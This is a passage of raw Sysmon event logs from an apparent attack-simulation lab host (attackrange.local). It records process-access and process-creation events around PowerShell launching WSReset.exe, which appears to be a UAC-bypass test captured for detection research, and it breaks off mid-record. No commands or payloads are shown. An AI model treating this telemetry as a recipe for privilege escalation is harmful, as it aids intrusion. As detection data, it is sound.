 10341000x80000000000000001051134Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:31.948{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051133Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:31.948{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051132Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:31.947{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051131Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:31.947{466BC892-02AD-60E8-0500-00000000CF01}408424C:\Windows\system32\csrss.exe{466BC892-F5EB-60EB-867D-00000000CF01}2348C:\Windows\system32\OpenWith.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001051130Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:31.947{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-F5EB-60EB-867D-00000000CF01}2348C:\Windows\system32\OpenWith.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+36349|c:\windows\system32\rpcss.dll+3bb32|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001051129Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:31.933{466BC892-F5EB-60EB-867D-00000000CF01}2348C:\Windows\System32\OpenWith.exe10.0.14393.4169 (rs1_release.210107-1130)Pick an appMicrosoft® Windows® Operating SystemMicrosoft CorporationOpenWith.exeC:\Windows\system32\OpenWith.exe -EmbeddingC:\Windows\system32\ATTACKRANGE\bob{466BC892-32CE-60E8-37BC-780000000000}0x78bc373MediumMD5=196A5E5EF42F8CADACD75FAF17E18689,SHA256=8E9759AE4C7644BC975A2A33BC9E4D17C39B4D6DAAE19F7401181C05DC9D1B90,IMPHASH=3DC53F3258E7C5C7131E7C13F7BD06C9{466BC892-02AF-60E8-0C00-00000000CF01}844C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 10341000x80000000000000001051128Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:31.901{466BC892-02AD-60E8-0B00-00000000CF01}624800C:\Windows\system32\lsass.exe{466BC892-F5EB-60EB-837D-00000000CF01}4728C:\Windows\System32\WSReset.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051127Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:31.901{466BC892-02AD-60E8-0B00-00000000CF01}624800C:\Windows\system32\lsass.exe{466BC892-F5EB-60EB-837D-00000000CF01}4728C:\Windows\System32\WSReset.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051126Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:31.818{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-F5EB-60EB-837D-00000000CF01}4728C:\Windows\System32\WSReset.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051125Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:31.814{466BC892-02B0-60E8-1600-00000000CF01}13044400C:\Windows\System32\svchost.exe{466BC892-F5EB-60EB-837D-00000000CF01}4728C:\Windows\System32\WSReset.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051124Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:31.814{466BC892-02B0-60E8-1600-00000000CF01}13041340C:\Windows\System32\svchost.exe{466BC892-F5EB-60EB-837D-00000000CF01}4728C:\Windows\System32\WSReset.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\System32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051123Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:31.784{466BC892-02AD-60E8-0A00-00000000CF01}6163760C:\Windows\system32\services.exe{466BC892-F5EB-60EB-857D-00000000CF01}3312C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\services.exe+1713f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051122Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:31.783{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-F5EB-60EB-857D-00000000CF01}3312C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051121Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:31.772{466BC892-02AD-60E8-0500-00000000CF01}408524C:\Windows\system32\csrss.exe{466BC892-F5EB-60EB-857D-00000000CF01}3312C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001051120Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:31.772{466BC892-02AD-60E8-0A00-00000000CF01}6162696C:\Windows\system32\services.exe{466BC892-F5EB-60EB-857D-00000000CF01}3312C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+307d|C:\Windows\system32\services.exe+6334|C:\Windows\system32\services.exe+dc24|C:\Windows\system32\services.exe+d248|C:\Windows\system32\services.exe+4d0c|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051119Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:31.756{466BC892-02AD-60E8-0B00-00000000CF01}624800C:\Windows\system32\lsass.exe{466BC892-02AD-60E8-0A00-00000000CF01}616C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+1d1e8|C:\Windows\system32\lsasrv.dll+1c411|C:\Windows\system32\lsasrv.dll+1ac30|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051118Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:31.756{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051117Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:31.755{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051116Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:31.755{466BC892-02AD-60E8-0B00-00000000CF01}624800C:\Windows\system32\lsass.exe{466BC892-02AD-60E8-0A00-00000000CF01}616C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051115Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:31.690{466BC892-02B0-60E8-1600-00000000CF01}13044400C:\Windows\System32\svchost.exe{466BC892-F5EB-60EB-847D-00000000CF01}9312C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051114Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:31.690{466BC892-02B0-60E8-1600-00000000CF01}13041340C:\Windows\System32\svchost.exe{466BC892-F5EB-60EB-847D-00000000CF01}9312C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\System32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051113Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:31.683{466BC892-F5EB-60EB-847D-00000000CF01}93124772C:\Windows\system32\conhost.exe{466BC892-F5EB-60EB-837D-00000000CF01}4728C:\Windows\System32\WSReset.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051112Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:31.674{466BC892-32CD-60E8-670B-00000000CF01}45166612C:\Windows\system32\csrss.exe{466BC892-F5EB-60EB-847D-00000000CF01}9312C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001051111Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:31.666{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051110Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:31.666{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051109Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:31.666{466BC892-32CD-60E8-670B-00000000CF01}45163808C:\Windows\system32\csrss.exe{466BC892-F5EB-60EB-837D-00000000CF01}4728C:\Windows\System32\WSReset.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001051108Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:31.666{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051107Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:31.666{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051106Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:31.665{466BC892-F5E6-60EB-817D-00000000CF01}84729248osoft.PowerShell.ComWindowsPowerShell\v1.0\powershell.exe{466BC892-F5EB-60EB-837D-00000000CF01}4728C:\Windows\System32\WSReset.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+9070f|C:\Windows\System32\windows.storage.dll+90385|C:\Windows\System32\windows.storage.dll+8fe76|C:\Windows\System32\windows.storage.dll+912e8|C:\Windows\System32\windows.storage.dll+8fc9e|C:\Windows\System32\windows.storage.dll+92ab5|C:\Windows\System32\windows.storage.dll+92e34|C:\Windows\System32\windows.storage.dll+92470|C:\Windows\System32\shell32.dll+3cdcf|C:\Windows\System32\shell32.dll+3cc5c|C:\Windows\System32\shell32.dll+3c9ac|C:\Windows\System32\shell32.dll+122467|C:\W